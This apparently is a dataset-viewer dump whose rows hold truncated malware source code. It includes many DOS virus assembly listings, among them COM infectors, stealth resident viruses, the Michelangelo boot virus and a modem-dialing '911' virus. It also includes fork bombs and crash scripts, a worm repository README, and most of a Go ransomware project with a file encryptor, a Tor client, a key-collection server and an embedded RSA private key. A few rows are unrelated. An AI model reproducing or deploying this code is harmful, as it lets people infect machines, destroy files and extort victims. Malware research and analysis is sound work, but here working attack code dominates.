text stringlengths 0 20k |
|---|
; Kod rdowy wirusa nieznanego autorstwa. Widoczne s silne wpywy 648.
; Dodano wasne komentarze wskazujce na rnice midzy t wersj i oryginaem.
; Komentarze te poprzedzane s znakami AK:.
; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzenia 1990.
comment ;
***************************************************... |
;NAME: 512-X.C-M
;FILE SIZE: 00200h - 512d
;START (CS:IP): 00100h
;CODE END: 00300h
;CODE ORIGIN: 00100h
;DATE: Wed Aug 05 13:56:29 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
H00100: MOV AH,30h ;00100 B4... |
; virus from ALT-11 mag
; ---------------------------------------
;
; Coded by: Azagoth
; ---------------------------------------
; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm
; tlink /t <filename>.obj
; ---------------------------------------------------------------------------
; - Non-Overwriting .C... |
code segment
assume cs:code,ds:code,es:code,ss:code
org 100h
main proc near
mov dx,offset(nev) ; offset to '*.*'
mov ah,4Eh
int 21h ; find first
mov dx... |
PAGE 59,132
;
;
; 1701-B
;
; Created: 11-Feb-92
; Passes: 5 Analysis Options on: none
;
;
data_31e equ 27D1h ;*
data_36e equ 4CD6h ;*
data_39e equ 6950h ;*
data_45e equ 8848h ;*
data_50e e... |
;****************************************************************************
;* Seventh son of a seventh son version 2
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
FILELEN equ ... |
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; ... |
>>> Article From Evolution #2 - YAM '92
Article Title: 382 Virus
Author: Admiral Bailey
;=---
;
; 382 Virus (Family-Q as McAfee 91 calls it)
;
; Disassembled By Admiral Bailey [YAM '92]
; June 25, 1992
;
; The writer of this is unknown to me... maybe you should put some of
; your info in it.
;
; Notes:This virus I f... |
;****************************************************************************
;* Seventh son of a seventh son version 4
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibil... |
;PROGRAM NAME: 512.com
;-------------------------------------------------
H00100: MOV AH,30h
INT 21h ;DOS Version#
MOV SI,0004h
MOV DS,SI ;SEGMENT OPERATION
CMP Byte Ptr AH,1Eh
LDS AX,[SI+08h]
JB H0011B ; . . . . .... |
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; ... |
; Basic little bitty program for people learning about the different modes
; you can stick on your monitor. This program will put you into 80*50 on a
; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested
; it.) Anyways, I tried to comment it so someone not knowing asm would be
; able to under... |
; =======================================================================>
; 100% By MnemoniX - 1994
;
; This is a memory resident .COM infector which hides itself using
; directory stealth (11/12 and 4E/4F). To avoid setting heuristic
; flags in TBAV, it overwrites part of the decryption routine with
; garbage an... |
;hmm.,.,.,.,without a name.,.,.,.,
;this file is much like the 606, only it
;is much more harmful...it has a special suprise
;for three diffrent dates....hehehehe.,.,,..,.,
;i had planned to have it in with the other TR-
;series, but this was much to large to add in with.,.,
;enjoy!....
; nUcLeii
; ... |
PAGE 59,132
;
;
; 1575-E
;
; Created: 23-May-92
; Passes: 5 Analysis Options on: none
;
;
data_1e equ 6
data_2e equ 84h
data_3e equ 86h
data_4e equ 100h
data_10e equ 31Fh
data_12e equ 0 ;*
d... |
;*****************************************************************************
;
; Pixel - 299 virus
;
; Disassembled By Admiral Bailey [YAM '92]
;
; Notes: I dont know where the hell I got this one from but when I found it on
; one of my disks it was named incorectly. Some Amst shit but I looked
; it u... |
VSize=085h
Code Segment
Assume CS:Code
org 0
db 4Dh
jmp Start
Org 600h
Bytes db 0CDh,20h,90h,90h
Start: mov si, 0100h
mov bx, offset Int21
mov ... |
title The '405' virus
page 65,132
; ͻ
; British Computer Virus Research Centre
; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England
; Telephone: Domestic 0273-26105, International +44-273-26105
; ... |
PAGE 59,132
;
;
; 1575-E
;
; Created: 23-May-92
; Passes: 5 Analysis Options on: none
;
;
data_1e equ 6
data_2e equ 84h
data_3e equ 86h
data_4e equ 100h
data_10e equ 31Fh
data_12e equ 0 ;*
d... |
From smtp Tue Feb 7 13:13 EST 1995
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue, 7 Feb 95 13:13 EST
Received: by lynx.dac.neu.edu (8.6.9/8.6.9)
id NAA30823 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:16:19 -0500
Date: Tue, 7 Feb 1995 13:16:19 -0500
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
Content-L... |
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; ... |
;***************************************************************************
;* *
;* 196 - Research Virus Version 1.01 Date. 11th April 1992. *
;* *
;* Written ... |
PAGE 59,132
;
;
; 1701-B
;
; Created: 11-Feb-92
; Passes: 5 Analysis Options on: none
;
;
data_31e equ 27D1h ;*
data_36e equ 4CD6h ;*
data_39e equ 6950h ;*
data_45e equ 8848h ;*
data_50e e... |
; virus from ALT-11 mag
; ---------------------------------------
;
; Coded by: Azagoth
; ---------------------------------------
; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm
; tlink /t <filename>.obj
; ---------------------------------------------------------------------------
; - Non-Overwriting .C... |
; =======================================================================>
; 100% By MnemoniX - 1994
;
; This is a memory resident .COM infector which hides itself using
; directory stealth (11/12 and 4E/4F). To avoid setting heuristic
; flags in TBAV, it overwrites part of the decryption routine with
; garbage an... |
;******************************************************************
;* *
;* My First Virus, a simple non-overwriting COM infector *
;* *
;* by, Solomon ... |
; Basic little bitty program for people learning about the different modes
; you can stick on your monitor. This program will put you into 80*50 on a
; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested
; it.) Anyways, I tried to comment it so someone not knowing asm would be
; able to under... |
;***************************************************************************
;* *
;* 196 - Research Virus Version 1.01 Date. 11th April 1992. *
;* *
;* Written ... |
;Smallest in the trivial series of viruses, I think....
;Last I saw was 30 bytes - this one goes to 29.
;Code by Stormbringer... stupid virus, but small.
.model tiny
.radix 16
.code
org 100
start:
FindFile:
xchg cx,ax ;ax defaults to zero on runtime - cx doesn't
p... |
;NAME: 512-X.C-M
;FILE SIZE: 00200h - 512d
;START (CS:IP): 00100h
;CODE END: 00300h
;CODE ORIGIN: 00100h
;DATE: Wed Aug 05 13:56:29 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
H00100: MOV AH,30h ;00100 B4... |
;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS.
FILENAME equ 30 ;USED TO FIND FILE NAME
FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES
FILEDATE equ 24 ;USED TO FIND FILE DATE
FILETIME equ 22 ;USED TO FIND... |
PAGE 59,132
;
;
; 1701
;
; Created: 11-Feb-92
; Passes: 5 Analysis Options on: none
;
;
data_31e equ 27D1h ;*
data_36e equ 4CD6h ;*
data_39e equ 6950h ;*
data_45e equ 8848h ;*
data_50e equ... |
page 70,120
Name VIRUS
;*************************************************************************
; Program Virus Ver.: 1.1
; Copyright by R. Burger 1986
; This is a demonstration program for computer
; viruses. It has the ability to replicate itself,
; and the... |
PAGE ,132
S00000 SEGMENT BYTE PUBLIC 'code'
ASSUME CS:S00000
ASSUME SS:S00000
ASSUME DS:S00000
H00000 DB 256 DUP(?)
P00100 PROC FAR
ASSUME ES:S00000
H00100:
JMP SHORT H00104
DB 90H
H00103 DB 2
H00104:
CALL P0010A
JMP H006F1
P0010A PROC NEAR
H0010A:
PUSH CX
MOV BX,0138H
H0010E:
MOV CH,[BX]
XOR CH,H00103
MO... |
PAGE 59,132
;
;
; 911 Virus
;
; This program is the 911 Virus. Use at your own risk. When the
; manipulation task begins, it will dial 911 through your modem
; and display "Support Your Police" on the screen.
;
; Assem... |
From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994
Xref: netcom.com alt.comp.virus:506
Path: netcom.com!ix.netcom.com!netnews
From: Zeppelin@ix.netcom.com (Mr. G)
Newsgroups: alt.comp.virus
Subject: 7th Son Virus
Date: 29 Nov 1994 13:02:59 GMT
Organization: Netcom
Lines: 236
Distribution: world
Message-ID: ... |
muttiny segment byte public
assume cs:muttiny, ds:muttiny
org 100h
start: db 0e9h, 5, 0 ; jmp startvir
restorehere: int 20h
idword: dw 990h
; The next line is incredibly pointless. It is a holdover from one
; of the origi... |
; Basic little bitty program for people learning about the different modes
; you can stick on your monitor. This program will put you into 80*50 on a
; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested
; it.) Anyways, I tried to comment it so someone not knowing asm would be
; able to under... |
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; ... |
;405 virus
;disassembled 10th March 1991 by Fred Deakin.
;
start:
xchg si,ax ;96 }marker bytes ?
add [bx+si],al ;00 00 }
sahf ;9e }
add [bx+si],al ;00 00 }
nop ;90 }
mov ax,0000h ;clear ax
mov byte es:[drive],al ;defa... |
PAGE 60,132
;
;
; 15APR
;
; Created: 4-Mar-91
;
;
data_1e equ 4Ch ; (0000:004C=31h)
data_2e equ 4Eh ; (0000:004E=70h)
data_3e equ 84h ; (0000:0084=0E3h)
data_4e equ 86h ; (0000:0086=161Ah)
data_5e e... |
# Linux Malware Samples - A Collection of Linux Malware Binaries
[](https://github.com/MalwareSamples/Linux-Malware-Samples/issues)
[](http://hits.dwyl... |
from datasets import load_dataset
ds = load_dataset("json", data_files="code_dataset.json")
ds.push_to_hub("walter-taya/code-dataset")
|
<!-- Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/Mohamed-Awad-31?srid=u2HNX -->
<!-- The site contains JavaScript code which generates an infinite string of characters that overwhelms the device's memory.
May not work on some browsers. -->
<a href="http://... |
# CuteVirusCollection
#### A Collection of Cute But Deadly Viruses
**They will instantly snatch control from you. Then will sicken your high-end PC by overflowing the RAM & overwhelming the processor. And you will see your computer groaning till it crashes. Believe me, viruses were never so lovely before.**
Computer ... |
<!-- Source: http://jsenabled.blogspot.com/2011/09/9-funniest-javascript-effects.html -->
<!-- Opens lots of windows in the browser and crushes the PC. -->
<html>
<head>
<title>Unclosable Window</title>
<script>
activ = window.setInterval("Farbe()", 100);
farbe=1;
function Farb... |
// Opens an infinite number of command prompt window till the system crushes. Works on Windows OS only.
#include <stdlib.h>
main(){
while(1){
system("start cmd");
}
}
|
// Simply shuts the system down.
// Put the compiled executable in the startup directory
// (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup)
// of WindowsOS. And be the Devil!
// Caution: This will prevent you from turning the PC on. To
// solve, you can turn on the PC in safe mode and remove the
// executab... |
// Randomly moves the window round. Only Ctrl+Alt+Del will work here.
#include <windows.h>
#include <math.h>
DWORD WINAPI moveit(){
HWND a=GetForegroundWindow();
int i,j,k=1;
while(k++){
i=200+300*cos(k);
j=150+300*sin(k);
MoveWindow(a,i,j,i,j,1);
Sleep(50);
}
}
main()... |
// Developer: Minhas Kamal
// Randomly moves the mouse pointer, & clicks different places on the screen.
import java.awt.Robot;
import java.awt.event.InputEvent;
import java.util.Random;
public class out_of_control {
public static void main(String[] args) throws Exception {
Robot robot = new Robot();
Ra... |
' Developer: Minhas Kamal
' Shows an unending sequence of annoying messages.
' Put it in the startup directory (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup)
' of WindowsOS and kill your subject with annoyance.
DO UNTIL a
WScript.Sleep(29999)
x=MsgBox("There was a problem detected in your system. Do you w... |
:: Source- www.technicalnews.in/smallest-virus-of-the-world-5-characters-can-eat-your-machine
:: This batch program recursively executes itself forever and takes up full CPU usage.
%0|%0
|
// A fork-bomb that creates lots of child process till the computer gives up. Works on Unix-like OS.
#include <unistd.h>
int main(){
while(1) fork();
}
|
:: Source- http://www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html
:: Creates a lot of folders on the disk. Running it for long time may crush hard-disk.
:x
md %random%%random%
goto x
|
# Source- http://askubuntu.com/questions/159491/why-did-the-command-make-my-system-lag-so-badly-i-had-to-reboot
# Creates an infinite number of processes.
:(){ :|:& };:
|
// Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/George-Gonzalez-5?srid=u2HNX
// Consumes full space of the RAM.
main(){
while(malloc(1000));
}
|
<!-- Intro- Creates a super big string and overwhelms the RAM. -->
<!-- Details- http://stackoverflow.com/questions/10965987/how-do-you-force-chrome-pages-tabs-to-crash-using-javascript -->
<script>
var txt = "a";
while(1){
txt += "a";
}
</script>
|
# Just Crashed Windows!
> When you say- "I wrote a program that crashed Windows", people just stare at you blankly and say- "Hey, I got those with the system, **for free**".
>> -Linus Torvalds
<br />
<div align="right">
<b><i>So cute that the quote alone can crush the system.</i></b>
</div>
|
## Viruses
Trojans/Viruses/Worms/Rootkits Source Code Repository
## Worms Section
### lnk virus.txt
This is a famous worm that creates shortcut in usb. what was its intention was unknown to most of world, here is a complete source code of it, how elegantly it was designed.
- Properties of this worm are
- Self Sprea... |
[](./LICENSE)
### CREDITS
- bUILT WITH BYOR Tool - Mauri, Obfuscator, LIFKA, Networkchuck -
# <h1 align="center"> KENYATTA Ransomware 🤐 </h1>

  
func TestEncryptDecrypt(t *testing.T) {
key := "us55VKQ3GT7K1YxHwFyO1KS7ULC14ILo"
pwd, err := os.Getwd()
handleErr(err, t)
err = ioutil.WriteFile("original.txt", []byte("Hello World"), 0600)
handleErr(err, t)
f, err := os.Open("original.txt")... |
// Package cryptofs provides a basic abstraction for file encryption/decryption
package cryptofs
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"io"
"os"
)
// Type File wrap an os.FileInfo
type File struct {
os.FileInfo
Extension string // The file extension without dot
Path string // The absolute p... |
# Ransomware
[](https://travis-ci.org/mauri870/ransomware)
> Note 1: This project is purely academic, use at your own risk. I do not encourage in any way the use of this software illegally or to attack targets without their previous authoriza... |
package rsa
import (
"crypto/rand"
"crypto/rsa"
"crypto/sha256"
"crypto/x509"
"encoding/pem"
"fmt"
)
// Encrypt content with a public key
func Encrypt(publicKey []byte, text []byte) ([]byte, error) {
block, _ := pem.Decode(publicKey)
pubkeyInterface, err := x509.ParsePKIXPublicKey(block.Bytes)
pubkey, _ := p... |
package rsa
import (
"strconv"
"testing"
)
var (
PRIV_KEY = []byte(`
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAxa7DJ2kw+JOICpeJ7lDMksQ1ZIVxb4npjskM6TyP5pAgN5Cd
x7WcCVa0bHoVgnRI7WTZmVBLA9QssqAJHav6kroo/0X7dibhghG1mUujgPxq//j4
pPvq0qIMBeQbOB3sryLB/1ScgQzByJBuEBgmFHWfLq7LJUyKmZd1uzKAEtJsrY3f
7WhcWfiqMemMeJl7zvM... |
package utils
import (
"fmt"
"io"
"os"
)
// DownloadProgressReader wraps an existing io.Reader and show the copy progress
//
// It simply forwards the Read() call, while displaying
// the results from individual calls to it.
type DownloadProgressReader struct {
io.Reader
Total int64 // Total # of bytes transf... |
package utils
import (
"os/user"
"regexp"
"testing"
)
func TestGenerateANString(t *testing.T) {
sizes := []int{8, 16, 32, 64}
for _, size := range sizes {
key, err := GenerateRandomANString(size)
if err != nil {
t.Error(err)
}
if len(key) != size {
t.Errorf("Expect key with %d length, but got %d",... |
package utils
import (
"crypto/rand"
"encoding/hex"
"io"
"os"
"os/user"
"strings"
)
// Generate a random alphanumeric string with the given size
func GenerateRandomANString(size int) (string, error) {
key := make([]byte, size)
_, err := rand.Read(key)
if err != nil {
return "", err
}
return hex.EncodeTo... |
package web
import (
"net/http"
"strings"
"github.com/labstack/echo"
)
var (
ApiResponseForbidden = SimpleResponse{Status: http.StatusForbidden, Message: "Seems like you are not welcome here... Bye"}
ApiResponseBadJson = SimpleResponse{Status: http.StatusBadRequest, Message: "Expect valid json p... |
package web
import (
"encoding/json"
"fmt"
"net/http"
"github.com/labstack/echo"
"github.com/mauri870/ransomware/repository"
)
type Engine struct {
*echo.Echo
PrivateKey []byte
Database *repository.BoltDB
}
// NewEngine return a new echo.Echo instance
func NewEngine() *Engine {
return &Engine{
Echo: ... |
package web
import (
"net/http"
"github.com/labstack/echo"
"github.com/mauri870/ransomware/rsa"
)
// DecryptPayloadMiddleware try to decrypt the payload from request
func (e *Engine) DecryptPayloadMiddleware(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
// Retrieve the payload f... |
// +build windows
// +build go1.8
package main
import (
"encoding/base64"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"os"
"path/filepath"
"strings"
"sync"
"time"
"github.com/mauri870/ransomware/client"
"github.com/mauri870/ransomware/cmd"
"github.com/mauri870/ransomware/cryptofs"
"github.com/mauri870/rans... |
// +build windows
// +build go1.8
package main
import (
"encoding/base64"
"fmt"
"os"
"path/filepath"
"strings"
"github.com/mauri870/ransomware/cmd"
"github.com/mauri870/ransomware/cryptofs"
"github.com/mauri870/ransomware/utils"
)
func init() {
// Fun ASCII
cmd.PrintBanner()
// Execution locked for wind... |
package main
import (
"flag"
"fmt"
"log"
"io/ioutil"
"github.com/labstack/echo/engine"
"github.com/labstack/echo/engine/standard"
"github.com/labstack/echo/middleware"
"github.com/mauri870/ransomware/repository"
"github.com/mauri870/ransomware/web"
)
var (
// BoltDB database to store the keys
// Will be ... |
package cmd
import (
"fmt"
"log"
"os"
"runtime"
"sync"
"github.com/mauri870/ransomware/cryptofs"
"github.com/mauri870/ransomware/utils"
)
var (
UserDir = fmt.Sprintf("%s\\", utils.GetCurrentUser().HomeDir)
// Temp Dir
TempDir = fmt.Sprintf("%s\\", os.Getenv("TEMP"))
// Directories to walk searching for ... |
package cmd
import (
"os"
"github.com/fatih/color"
)
var (
banner = `
__________
\______ \_____ ____ __________ ______ _ _______ _______ ____
| _/\__ \ / \ / ___/ _ \ / \ \/ \/ /\__ \\_ __ \_/ __ \
| | \ / __ \| | \\___ ( <_... |
package client
import (
"fmt"
"io"
"net/http"
"net/url"
"strings"
"github.com/mauri870/ransomware/rsa"
"golang.org/x/net/proxy"
)
const (
TOR_PROXY_URL = "127.0.0.1:9050"
)
// Client wraps a http client
type Client struct {
ServerBaseURL string
PublicKey []byte
HTTPClient *http.Client
}
// New re... |
package repository
import (
"errors"
"log"
"github.com/boltdb/bolt"
)
var (
ErrorBucketNotExists = errors.New("Bucket Not Exists")
)
type BoltDB struct {
*bolt.DB
}
// Open or create a BoltDB database
func Open(name string) *BoltDB {
db, err := bolt.Open(name, 0600, nil)
if err != nil {
log.Fatalln(err)
... |
package repository
import (
"fmt"
"os"
"testing"
)
func TestRepositoryOpen(t *testing.T) {
db := Open("test.db")
defer db.Close()
defer os.Remove("test.db")
if fmt.Sprintf("%T", db) != "*repository.BoltDB" {
t.Errorf("Expect *repository.BoltDB but got %T\n", db)
}
}
func TestRepositoryCreateOrUpdate(t *te... |
#!/bin/bash
set -e
# Build the image
echo "Building the image..."
if docker history -q ransomware >/dev/null 2>&1; then
read -r -p "The image already exists. The project volume mounted can be older. Build it again? [y/N] " response
case "${response}" in
[yY]|[yY][eE][sS])
docker build -t r... |
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAn+zct953M4exvgKS4G36
xCa5wZfB9F9Ai58SP/UGDoN1chLLYt9wMjJ/B1KVLKCiiKknmCrJ47vzq931lDfb
1nSfvbCP3wyZScKTncdsZqfMjvz8+iC9oe7zev05KXRzXpLH99xbRHqzMX+W+aK+
Z+UFgwHs8IqzruL1d9JeOn6HGq4AHYFwyel4DuYG5OF+SfRmEF2iEWh1Iqo0L3Jn
7l0XSLOL1KGgnKST0kpfKOhZ0UIuXn35g... |
-----BEGIN RSA PRIVATE KEY-----
MIIJKAIBAAKCAgEAn+zct953M4exvgKS4G36xCa5wZfB9F9Ai58SP/UGDoN1chLL
Yt9wMjJ/B1KVLKCiiKknmCrJ47vzq931lDfb1nSfvbCP3wyZScKTncdsZqfMjvz8
+iC9oe7zev05KXRzXpLH99xbRHqzMX+W+aK+Z+UFgwHs8IqzruL1d9JeOn6HGq4A
HYFwyel4DuYG5OF+SfRmEF2iEWh1Iqo0L3Jn7l0XSLOL1KGgnKST0kpfKOhZ0UIu
Xn35gNuiVAvpwZFPdgw6yNqkt75W... |
// +build windows
//
// Package tor provides a wrapper around the tor proxy command
package tor
import (
"archive/zip"
"bufio"
"bytes"
"fmt"
"io"
"net/http"
"os"
"os/exec"
"path/filepath"
"strings"
"syscall"
"github.com/mauri870/ransomware/utils"
)
const (
// IsReadyMessage indicates that tor is ready f... |
## Startup encryptor
$'
DB 1961 DUP (1)
L08D0: JMP L0C51
NOP ; \
NOP ; \
NOP ; \
L08D6: MOV AH,09H ; \
MOV DX,010CH ; > ORIGINAL 24 BYTES
INT 21H ; /
L08DD: INT 20H ; /
; /
L08DF: DB 'Mu... |
;******************************************************************************
;******************************************************************************
;**** Virus: .COM /noTBAV ****
;**** By: Ramthes Jones ****
;******************************************************************************
... |
;****************************************************************************
;* The Mutating Interrupt Virus -Soltan Griss-
;* [RABID] -=+ Front 242 +=-
;*
;*
;* Well this is my Third Release of many to come. This virus uses the latest
;* of RABI... |
;
;Happy Birthday Robbie Virus
;
code segment 'CODE'
assume cs:code,ds:code,es:code,ss:code
org 0100h
code_length equ finish - start
lf equ 0Ah
cr equ 0Dh
start label near
id_bytes proc near
mov si,si ... |
.model tiny
.code
org 100h
start:
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
; A NEW ORDER OF INTELLIGENCE PRESENTS: ;
; My Little Pony 1.00 ;
; Copyright (c) 1992... |
TITLE MICHELANGELO, a STONED - derived Boot Virus
SUBTTL reverse engineered source code for MASM 5.1/6.0
PAGE 60,132
.RADIX 16
IF1
%Out VIRAL SOFTWARE, DO NOT DISTRIBUTE WITHOUT NOTIFICATION ͻ
%Out
%Out Ŀ
%Out Ĵ M I C H E L A N ... |
;****************************************************************************
;* Mini non-resident virus
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
.RADIX 16
FILELEN ... |
page ,132
;
; name: mg-3.vom
;
; program type: com/bin
;
; cpu type: 8086
;
; program loaded at 0000:01f8
;
; physical eof at 0000:03f5
;
; program entry point at 0000:01f8
;
fun segment
assume cs:fun,ds:fun,es:fun,ss:fun
;
; references before the start of code space
;
org 0006h
h_0006 label word
org 004ch
h_... |
Virus relationship charts of Masud Khafir's viruses
===================================================
Gotcha F (732)
Gotcha E (607)
Gotcha A (879)
Gotcha B (881)
Gotcha C (906)
Gotcha D (627)
Pogue
... |
;virus date 12/31/93
;disassembly of 1 version of the MICHElANGLO VIRUS
;michelangelo with a loader that will put the virus
;on a disk in drive b: will work correctly on 360 or 1.2meg disks
;loads orginal boot at last sector on those type of disks
;warning if computer date ... |
; ========================================================================>
; MutaGenic Agent ][ - MutaGen V1.3 Test Virus
; by MnemoniX 1994
;
; A simple resident .COM infector implementing MutaGen.
; To assemble:
; TASM mg2
; TLINK /t mg2 mutagen
; =====================================================... |
; Virusname : Metallic Moonlite
; Virusauthor: Metal Militia
; Virusgroup : Immortal Riot
; Origin : Sweden
;
; It's a non-resident, current dir infector of com-files. every first
; of any month it will put a bit of code resident to make ctrl-alt-del's
; to coldboots and delete all files being executed. It's encry... |
; McWhale.asm : [McAfee' Whale] by [pAgE]
; Created wik the Phalcon/Skism Mass-Produced Code Generator
; from the configuration file skeleton.cfg
;
; Here's another "lame dick" virus! I thought it was rather fitting!
; Many thanks to the fellows at Phalcon/Skism for this little tool.
; I am sure that Dark Angel and the... |
; MERDE-3: A resident, non-overwriting .Com infector by the loki-nator
;Well, here it is, for what it's worth.. It is really kind of a
;piece of crap, but it is just a rough draft..
;NOTES:
; If this gets into Command.Com, it (command) won't work for unknown reasons..
; I could have fixed it by just checking to... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.